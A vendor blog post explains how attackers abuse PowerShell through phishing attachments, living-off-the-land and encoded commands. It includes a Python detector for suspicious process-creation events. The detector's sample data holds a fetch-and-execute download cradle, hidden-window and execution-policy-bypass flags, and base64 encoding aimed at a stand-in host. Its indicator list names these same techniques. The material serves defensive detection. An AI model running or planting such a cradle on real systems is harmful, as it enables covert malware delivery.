Blog Post July 13, 2023

Battling PowerShell Attacks with Cybersecurity Automation

By: Krystal Rennie, Director of Corporate Communications 

In today’s digital age, we rely on computer systems for most of our everyday tasks. From browsing the internet to sending email, much of that activity is automated, and the routine patterns it creates are perfectly normal. Those same patterns, however, leave trails that cybercriminals can turn against your organization.

According to Microsoft, PowerShell is “a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS.” It provides an interface for system administrators and users to carry out various tasks like running files, taking screenshots on the computer, accessing the internet, and more. 

This blog will explore how cybercriminals can use PowerShell, why they are so hard to detect, and how you can ensure your organization remains vigilant against attackers.  

PowerShell Attacks in Action   

To put it simply, PowerShell is installed on every Windows computer, so by default it is an easy entry point for cybercriminals to abuse: they do not have to bring their own tools. System administrators also rely on PowerShell to complete their tasks, and Windows itself depends on it, so it cannot be removed; it is core functionality.

In action, cybercriminals tend to abuse PowerShell because it lends itself to living-off-the-land tactics. Malicious actors can use PowerShell to create a malware implant or to download and execute malware. Once they have access to your network, they can run commands and remain under the radar.

For example, an attacker can trigger PowerShell through a simple spear phishing email that carries a PDF or Word document as an attachment. When the recipient opens the document, the malicious code it contains runs and, as its final step, launches PowerShell. PowerShell then downloads the additional malware stages that infect the computer.

Cybercriminals do not go out of their way to reinvent the wheel when planning their attacks; where there is an easy point of entry, they will use it to their advantage. Opening an attachment is a common task for employees, and cybercriminals know that. Using familiar techniques like the above is a perfect way to lure in potential victims and gain access to organizational data.  

Why are PowerShell Attacks Difficult to Detect?  

As attackers advance their techniques, they also recognize that to maintain success, they must keep their tactics simple yet effective. Below are a few reasons PowerShell attacks are hard to detect: 

  1. Easy Access to Windows API: PowerShell lets cybercriminals run automated tasks and everyday administrative tasks through the same Windows API that legitimate tooling uses, without worrying about being blocked by an IT team.
  2. Living-off-the-Land: PowerShell is a powerful command shell that does whatever it is told. Cybercriminals use PowerShell as a native tool present on every Windows computer to advance their attacks. Using techniques that are already part of the system lets cybercriminals do less preparation and execute faster.
  3. Hiding in Plain Sight: Cybercriminals often encode their PowerShell commands so that they appear as a meaningless string of letters and numbers. This hides malicious commands from security systems, because detecting them would first require decoding the string.

Although detection can be tricky when looking at PowerShell as an attack method, with proper tools in place, such as an automated security solution with threat intelligence, it is not impossible. 

For example, Adlumin’s Threat Research team recently uncovered “PowerDrop,” a malicious PowerShell script that has set its sights on the U.S. aerospace industry. The malware uses advanced techniques such as deception, encoding, and encryption to evade detection. The threat was detected by Adlumin’s machine learning-based algorithms, which analyze PowerShell commands and arguments at run-time. In essence, the malware is used to run remote commands against victim networks after the attacker gains initial access, execution, and persistence on servers.
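As an added illustration of two points made above, the attachment-launched PowerShell chain and the encoded commands that hide in plain sight, here is a small rule-based detector that runs over process-creation events. It is example code written for this post, not Adlumin’s detection logic and not the PowerDrop analysis. The event records and the encoded command are constructed sample data; the field names (Image, ParentImage, CommandLine) follow the Sysmon process-creation style, and the indicator list is an assumption about what a first-pass rule would look for rather than a complete signature set.

```python
import base64
import re
from typing import Optional

# Document handlers that should rarely, if ever, launch PowerShell directly.
# Assumed list for this example; tune it to the applications in your environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}

# Indicators checked against both the raw command line and the decoded payload.
# Case-insensitive; the labels are the findings reported to the analyst.
SUSPICIOUS_PATTERNS = [
    (r"\bdownloadstring\b|\bdownloadfile\b|\binvoke-webrequest\b|\biwr\b", "download cradle"),
    (r"\binvoke-expression\b|\biex\b", "dynamic execution"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-e(?:xecutionpolicy)?\s+bypass", "execution policy bypass"),
]

# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell_command(command: str) -> str:
    """Base64 of the UTF-16LE bytes, which is the format -EncodedCommand expects.
    Used here only to build the constructed sample event."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line carries an -EncodedCommand
    argument that decodes cleanly; otherwise None (no flag, bad base64, or
    bytes that are not valid UTF-16LE)."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list:
    """Apply the rules to one process-creation event and return the findings."""
    findings = []
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return findings
    # Rule 1: the phishing chain described above, a document handler launching PowerShell.
    if parent in OFFICE_PARENTS:
        findings.append(f"powershell spawned by document handler {parent}")
    # Rule 2: encoded commands are decoded so the indicators can be matched
    # against what actually runs, not just the opaque base64 string.
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        findings.append("encoded command")
    text = event["CommandLine"] + " " + (decoded or "")
    for pattern, label in SUSPICIOUS_PATTERNS:
        if re.search(pattern, text, re.IGNORECASE):
            findings.append(label)
    return findings


# Constructed sample events, not real telemetry. The URL uses the reserved
# .invalid top-level domain so the sample never resolves anywhere.
STAGE2_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/a')"

BENIGN_ADMIN_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "ParentImage": r"C:\Windows\explorer.exe",
    "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\Get-DiskUsage.ps1",
}

PHISHING_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    "CommandLine": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc "
    + encode_powershell_command(STAGE2_CRADLE),
}


if __name__ == "__main__":
    for name, event in (("benign admin", BENIGN_ADMIN_EVENT), ("phishing chain", PHISHING_EVENT)):
        print(f"{name}: {analyze_event(event) or 'no findings'}")
```

The benign administrative run produces no findings, while the constructed phishing event yields six: the Office parent, the presence of an encoded command, and the four indicators that only become visible once the base64 is decoded back to UTF-16LE text. The decoding step is the point of the example; a rule that only matches on the raw command line would see a parent-process anomaly and nothing else.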

Implementing an automated security solution with a multi-layer detection approach is the key to uncovering attackers’ actions in your network and protecting your organization before chaos hits. With the proper solution in place, malicious behavior can be detected, alerted on, and responded to in real time.

Test Your Defenses: PowerShell Attack Simulator Tool 

Ensuring your organization has the proper tools and proactive measures to protect against PowerShell attacks is essential, and that specifically means testing your environment against PowerShell-based attacks. As automation, cybersecurity, and the digital landscape evolve, cybercriminals will only become more advanced in planning their attacks.

Adlumin has developed a free tool for security teams to test their defenses against common ways attackers gain access. PowerShell is a common tool attackers leverage to infiltrate an environment. The simulation runs through multiple ways PowerShell may be used maliciously so that you can gain visibility into your coverage against these threats.  

See how your security stands against the tactics and tricks used by cybercriminals. Download Adlumin’s free PowerShell Attack Simulator tool today or contact one of our cybersecurity experts for a demo and more information.